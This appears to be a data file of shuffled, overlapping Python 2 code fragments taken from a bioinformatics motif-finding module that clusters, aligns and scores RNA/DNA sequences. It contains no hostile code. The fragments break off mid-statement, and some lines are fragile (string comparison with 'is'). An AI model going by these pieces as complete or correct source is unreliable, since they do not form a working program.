"stdout, stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n')))",
"% e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test",
"extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for h, s in haystack: for match",
"self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer,",
"+= scores d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d",
"for h, s in haystack: for match in re.finditer(needle, s): s = match.start()",
"cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders",
"' * (complexity * 2) # join all sequences in a cluster with",
"in motives) + 1 cooccurence_mtx = np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids",
"d_time, d_loc_time)) pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100,",
"subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header, score, begin, end, subseq def",
"[s for h, s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the",
"j > i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j,",
"multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception as e: logger.debug('Failed iteration.",
"<NAME> @email: <EMAIL> \"\"\" import logging import multiprocessing as mp import os from",
"pad_inches=0) else: figname = None plt.show() plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\"",
"annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq, score in annotated_seqs] return",
"(#%d), %d (#%d) score: %.2f' % \\ (i, n_i, j, n_j, rel_nw_score) info2",
"= [] for h, s in haystack: for match in re.finditer(needle, s): s",
"end = subarray['end'] score = subarray['score'] header = orig_header header += '<loc>%d:%d<loc>' %",
"line_str: seq += str(line_str[0]).strip() if seq: yield seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A",
"seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: components",
"= time.time() classes = np.array([1, -1]) if n_jobs == -1: pool = mp.Pool()",
"fname: plt.draw() figname = '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else:",
"reverting to default values') logger.debug('ECDF fit on %d values' % (len(scores))) logger.debug('Optimal params:",
"neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred)",
"fname=None): \"\"\"plot_location.\"\"\" locs = [] for h, s in haystack: for match in",
"time.time() - start_time d_loc_time = time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d %s",
"np.percentile(locs, 50) std_loc = np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc = -1",
"= [score for header, score, begin, end, subseq in self.decomposition_scores(seqs)] if scores: xs,",
"logos else: logger.warning( 'No logo to compute. Try more permissive parameters.') def _save_logo(self,",
"url = pwd + '/' + fname txt = [] if fill_width: if",
"j in cluster_ids: cooccurence_mtx[i, j] += 1 if i != j: # find",
"(%.2f secs) (delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix =",
"scores = [score for seq, score in annotated_seqs] return scores def multiprocess_score(iterable, vectorizer=None,",
"else: line_str = line.split() if line_str: seq += str(line_str[0]).strip() if seq: yield seq",
"Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio",
"sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score,",
"% (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close()",
"regex_i = motives[i]['regex_seq'] if j != cluster_id: regex_j = motives[j]['regex_seq'] ds = distances[(cluster_id,",
"units options.first_index = first_position if logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width",
"50) std_loc = np.percentile(locs, 70) - np.percentile(locs, 30) else: avg_loc = -1 std_loc",
"k = c.most_common() if k[0][0] == '-': to_be_removed.append(i) val = k[1][1] else: val",
"seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters =",
"logger.debug('...done in %.2f secs' % (dtime)) self.clusters = defaultdict(list) for pred, seq in",
"all sequences in a cluster with enough space that # kmers dont interfere",
"np.exp(-(x - a) / b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid on the",
"return imagename def _wrap_image(self, fname, fill_width=True, output_type='screen'): pwd = os.getcwd() url = pwd",
"seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size = max(id for id in motives)",
"(time.time() - start_time)) logger.debug('Fitting') start_time = time.time() for i, (p, n) in enumerate(izip(pos_results,",
"edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score = 2 * nw_score / (len(seq_i) + len(seq_j)) if",
"Reason: %s' % e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score",
"'%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show()",
"= s + (e - s) / 2 locs.append(m) if locs: avg_loc =",
"results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup",
"trimmed_align_seqs = self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: consensus_seq",
"vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2)",
"score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if",
"fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp < 0]",
"dtime)) logger.debug('After motives computation, %d motives' % len(motives)) return motives def _identify_mergeable_clusters(self, motives,",
"%s vs %d %s: %d' % \\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info)",
"for j in cluster_ids: cooccurence_mtx[i, j] += 1 if i != j: #",
"xs, ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b =",
"regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters,",
"n_clusters self.min_subarray_size = min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size",
"binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None,",
"_is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size:",
"for seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for",
"options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index",
"cluster_id in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id] = (logo_image, logo_txt)",
"= [s for h, s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize",
"= multiprocess_performance( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm",
"width = end - start val = sum(sig[start:end]) yield val, start, end, width",
"= time.time() subarrays_items = [] for i, p in enumerate(results): loc_start_time = time.time()",
"e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\"",
"_fasta_to_seqs(self, headers, stdout): out = list(_fasta_to_fasta(stdout.split('\\n'))) motif_seqs = [''] * len(headers) for i",
"d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs =",
"for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end - begin) / 2)",
"similarity_th: yield rel_nw_score, i, j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3,",
"def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids: for h, s in motives[i]['seqs']:",
"motives computation, %d motives' % len(motives)) return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for",
"if j > i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i,",
"else: if len(sig) >= median_len: sigs = sigs + sig[:median_len] sig = np.array(sigs)",
"[] binary_preds = [] true_targets = [] for i, (p, n) in enumerate(izip(pos_results,",
"= vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable = iter(iterable) while True:",
"np.vstack(cluster) size = len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c = Counter(row) k",
"len(trimmed_align_seqs) for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() code",
"motives] logos = dict() for cluster_id in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id,",
"= dict() for cluster_id in ids: logo_image, logo_txt = self.compute_logo( cluster_id=cluster_id, motif=motives[cluster_id]) logos[cluster_id]",
"weblogolib as wbl from scipy.cluster.hierarchy import linkage import regex as re from collections",
"!= '-': code.append(letter) if len(code) == 0: code_str = None elif len(code) ==",
"= sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index = first_position if logo_range:",
"def _perform_ma(self, data): params = {'maxiters': 7} if self.diags is True: params['diags'] =",
"zip(*seqs)] instances_seqrecord = [] for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i)))",
"seqs and compute their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels(",
"def serial_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items =",
"self.a = -4 self.b = 1 def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\"",
"else: row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx,",
"if figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label = x_label",
"= title if figure_label: options.logo_label = figure_label options.show_xaxis = show_x_axis if x_label: options.xaxis_label",
"None or freq >= freq_th: if std_th is None or std <= std_th:",
"= defaultdict(list) for seq_id, begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i))",
"i)) distances = defaultdict(list) size = max(id for id in motives) + 1",
"(delta: %.2f)' % (i, size, d_time, d_loc_time)) pool.close() pool.join() data_matrix = vstack(matrices) return",
"h, s in seqs]) sigs = None for scores in smod.score(seqs): sig =",
"[] for i in range(n): it = iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable,",
"- loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join()",
"align_seqs, min_freq=0.8): dim = len(align_seqs) cluster = [] for h, align_seq in align_seqs:",
"= vstack([pos_data_matrix, neg_data_matrix]) pred = estimator.decision_function(data_matrix) preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time =",
"\"\"\"Fit a parametrized sigmoid on the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\"",
"time.time() - start_time logger.debug( 'Cluster %d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime))",
"= orig_header header += '<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>' % (score)",
"while True: ms = sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success",
"instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue()",
"header): score = header.split('<score>')[1] score = float(score) loc = header.split('<loc>')[1] begin, end =",
"output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt = [] if motives: _, norm_cooccurence_mtx,",
"vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100, n_jobs=-1): \"\"\"multiprocess_subarray.\"\"\" start_time = time.time() if n_jobs ==",
"now #%d]' % \\ (j, i, n_i + n_j) logger.debug(info1 + info2) #",
"= header.split('<loc>')[0] return orig_header, score, begin, end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\"",
"= vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\"",
"count in k: if count / float(size) > regex_th: if letter != '-':",
"= np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def letter_regex(k, size,",
"end) header += '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq =",
"= len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score,",
"if letter != '-': code.append(letter) if len(code) == 0: code_str = None elif",
"sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\"",
"is True: params['diags'] = True if self.maxhours is not None: params['maxhours'] = self.maxhours",
"p <= p_value: yield orig_header, begin, end, p, subseq except Exception as e:",
"= Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = []",
"nbins=40, size=(17, 2), output_type='screen', fname=None): \"\"\"Report in markdown format.\"\"\" txt = [] if",
"clusters, complexity=3): sep = ' ' * (complexity * 2) # join all",
"0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign >= 0]",
"logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator,",
"% (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png'",
"width)) for h, s in seqs: if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod,",
"in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) score = 0",
"\"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in range(half_windw_size, sig_len - half_windw_size): min_sig =",
"motives], reverse=True): info = ' - %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info)",
"as np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import",
"float(counts) / size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\" for id in motives: c_regex",
"= ' - freq of occurrences of regex: %.2f' % (fr) txt.append(info) av",
"def multiprocess_score(iterable, vectorizer=None, estimator=None, block_size=100, n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs ==",
"options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme = wbl.std_color_schemes[color_scheme] options.resolution = resolution if",
"eden.sequence import Vectorizer from StringIO import StringIO from Bio import SeqIO from Bio.Align.Applications",
"for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() l =",
"len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score, i, j def merge(self, motives, similarity_th=0.5,",
"components = self._decompose_header(header) orig_header, score, begin, end, subseq = components p = self.compute_p_value(score)",
"\"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x - a) / b)) class PValueEvaluator(object):",
"vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1, -1])",
"= mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray, args=(seqs, vectorizer,",
"class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False,",
"return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids: for h,",
"-4, 1 scores = [score for header, score, begin, end, subseq in self.decomposition_scores(seqs)]",
"\"\"\"fit.\"\"\" try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except",
"for header, seq in subarrays_items: yield self._decompose_header(header) except Exception as e: logger.debug('Failed iteration.",
"sig_len = len(sig) for i in range(half_windw_size, sig_len - half_windw_size): min_sig = np.min(sig[i",
"- num co-occurences %d %s vs %d %s: %d' % \\ (cluster_id, regex_i,",
"in trimmed_align_seqs: str_list = [c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a'))",
"if logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths options.show_errorbars =",
"= (logo_image, logo_txt) return logos else: logger.warning( 'No logo to compute. Try more",
"info = '### Summary: %d motives' % len(motives) txt.append(info) figname = plot_cumulative_score( self,",
"sigmoid(value, self.a, self.b) p_val = 1 - y return p_val def compute_clusters(self, seqs=None,",
"metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders = [] for id1, id2",
"serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score for seq,",
"= 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j,",
"align with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size)",
"preds.append(pred) binary_pred = estimator.predict(data_matrix) binary_preds.append(binary_pred) d_time = time.time() - start_time d_loc_time = time.time()",
"self.maxhours is not None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr =",
"c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) seq =",
"def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def",
"%d' % \\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds): figname =",
"return orig_cooccurence_mtx, norm_cooccurence_mtx, distances def plot_distance(cluster_id_i, cluster_id_j, regex_i, regex_j, distances, nbins=5, size=(6, 2),",
"compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for subarray in",
"line in lines: if line: if line[0] == '>': if seq: yield seq",
"subarray['begin'] end = subarray['end'] score = subarray['score'] header = orig_header header += '<loc>%d:%d<loc>'",
"------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable, n):",
"subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable, vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10, block_size=100,",
"%.1f +- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq']",
"half_windw_size)) for i in range(len(ids) - 1): start = ids[i] end = ids[i",
"c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster) size =",
"pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size,",
"cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s in seqs]) sigs =",
"'/' + fname txt = [] if fill_width: if output_type == 'pdf': txt.append('<p",
"\"\"\"Report in markdown format.\"\"\" txt = [] if motives: _, norm_cooccurence_mtx, distances =",
"' - %.2s %s' % \\ (cluster_id, motives[cluster_id]['consensus_seq']) txt.append(info) for freq, cluster_id in",
"seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout = self._perform_ma(data) aligned_seqs =",
"__init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check if this alphabet is required #",
"align=\"left\"><img src=\"file://' + url + '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"' +",
"haystack): \"\"\"find_occurrences.\"\"\" for h, s in haystack: matches = re.findall(needle, s, overlapped=True) if",
"IUPAC.protein elif alphabet == 'rna': self.alphabet = IUPAC.unambiguous_rna else: self.alphabet = IUPAC.unambiguous_dna def",
"letter != '-': code.append(letter) if len(code) == 0: code_str = None elif len(code)",
"half_windw_size]) if min_sig == sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids =",
"float(len(seqs)) return sig def trim_seqs(seqs, smod, half_windw_size=7): \"\"\"trim_seqs.\"\"\" sig = cumulative_score(seqs, smod) val,",
"import linkage import regex as re from collections import Counter from sklearn import",
"+= '<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items += subseqs return",
"val = k[0][1] if float(val) / dim >= min_freq: score += 1 trimmed_align_seqs",
"= StringIO() SeqIO.write(instances_seqrecord, handle, \"fasta\") data = handle.getvalue() return headers, data def _perform_ma(self,",
"np.arange(1, len(xs) + 1) / float(len(xs)) return xs, ys def letter_regex(k, size, regex_th=0.3):",
"begin, end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for begin, end, cluster_id in",
"neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1, -1]) if n_jobs ==",
"output='all') subseqs = [] for subarray in subarrays: subseq_seq = subarray['subarray_string'] begin =",
"for scores in smod.score(seqs): sig = np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch:",
"line: if line[0] == '>': if seq: yield seq seq = \"\" line_str",
"seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores = [score for header, score,",
"fname=None): \"\"\"Report in markdown format.\"\"\" txt = [] if motives: _, norm_cooccurence_mtx, distances",
"= self.decompose(seqs, p_value=p_value) for header, begin, end, p, subseq in iterable: new_header =",
"in cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j] += 1 if i !=",
"n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as e: logger.debug('Failed iteration. Reason: %s' %",
"#!/usr/bin/env python \"\"\"SequenceMotifDecomposer is a motif finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\"",
"= [c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster =",
"std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet = 'rna' color_scheme =",
"\"\"\"find_occurrences.\"\"\" for h, s in haystack: matches = re.findall(needle, s, overlapped=True) if len(matches):",
"cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for h, s in",
"return motives def _identify_mergeable_clusters(self, motives, similarity_th=0.8): for i in motives: for j in",
"n_i + n_j) logger.debug(info1 + info2) # update motives motives[i] = motif del",
"from corebio.seq import Alphabet, SeqList import weblogolib as wbl from scipy.cluster.hierarchy import linkage",
"return logos else: logger.warning( 'No logo to compute. Try more permissive parameters.') def",
"rel_nw_score) info2 = ' deleting: %d [%d is now #%d]' % \\ (j,",
"e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def score(self, seqs=None): \"\"\"fit.\"\"\"",
"header, begin, end, p, subseq in iterable: new_header = header new_header += '<loc>'",
"return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix",
"compute_cooccurence(motives) info = '### Summary: %d motives' % len(motives) txt.append(info) figname = plot_cumulative_score(",
"- start_time)) logger.debug('Predicting') start_time = time.time() scores_items = [] for i, p in",
"subarrays_items def serial_score(iterable, vectorizer=None, estimator=None): \"\"\"serial_score.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) scores = [score",
"__init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1,",
"in zip(iterable, annotated_seqs): subarrays = compute_max_subarrays_sequence( seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs",
"= str(line) yield line_str.strip() else: line_str = line.split() if line_str: seq += str(line_str[0]).strip()",
"cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname, cluster_id) with open(imagename, 'wb') as f:",
"regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs}",
"= row[i] if norm != 0: row /= norm else: row = np.zeros(row.shape)",
"seqs in chunks(pos_iterable, pos_block_size)] neg_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs",
"in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein':",
"check if this alphabet is required # it over-rides tool.alphabet alphabet='dna', # ['dna',",
"import vstack from eden.util.iterated_maximum_subarray import compute_max_subarrays_sequence from itertools import izip import time from",
"time.time() classes = np.array([1, -1]) if n_jobs == -1: pool = mp.Pool() else:",
"# ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True),",
"logger.debug( 'Cluster %d (#%d) (%.2f secs)' % (cluster_id, len(clusters[cluster_id]), dtime)) logger.debug('After motives computation,",
"[] if fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url +",
"None or std <= std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) == 0: logger.warning('Quality",
"= np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds, true_targets def serial_subarray(iterable, vectorizer=None, estimator=None,",
"in centers[i]: for c_j in centers[j]: if selected_abs == abs(c_i - c_j): selected",
"finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import logging import multiprocessing as mp",
"[] for i, p in enumerate(results): loc_start_time = time.time() subarrays_item = p.get() subarrays_items",
"for creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False,",
"_compute_consensus_seq(self, align_seqs): cluster = [] for h, align_seq in align_seqs: str_list = [c",
"freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq,",
"vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: components =",
"h, s in clusters[cluster_id]] seq = sep.join(seqs) cluster_seqs.append(seq) # vectorize the seqs and",
"in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Performance evaluation') start_time",
"min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives(",
